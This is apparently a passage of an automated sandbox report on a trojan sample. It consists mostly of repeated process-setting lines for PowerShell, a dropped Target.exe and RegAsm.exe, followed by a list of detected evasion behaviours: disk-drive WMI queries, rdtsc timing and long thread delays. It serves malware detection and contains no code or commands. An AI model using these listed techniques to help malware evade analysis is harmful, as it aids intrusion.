                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeMemory allocated: 1FC70410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeMemory allocated: 1FC71E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory allocated: 1B0B8BD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory allocated: 1B0D26A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory allocated: 1DC42520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory allocated: 1DC5BE20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory allocated: 1F50C580000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory allocated: 1F526000000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA198D5 rdtsc 4_2_00007FFD9BA198D5
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeThread delayed: delay time: 922337203685477Jump to behavior
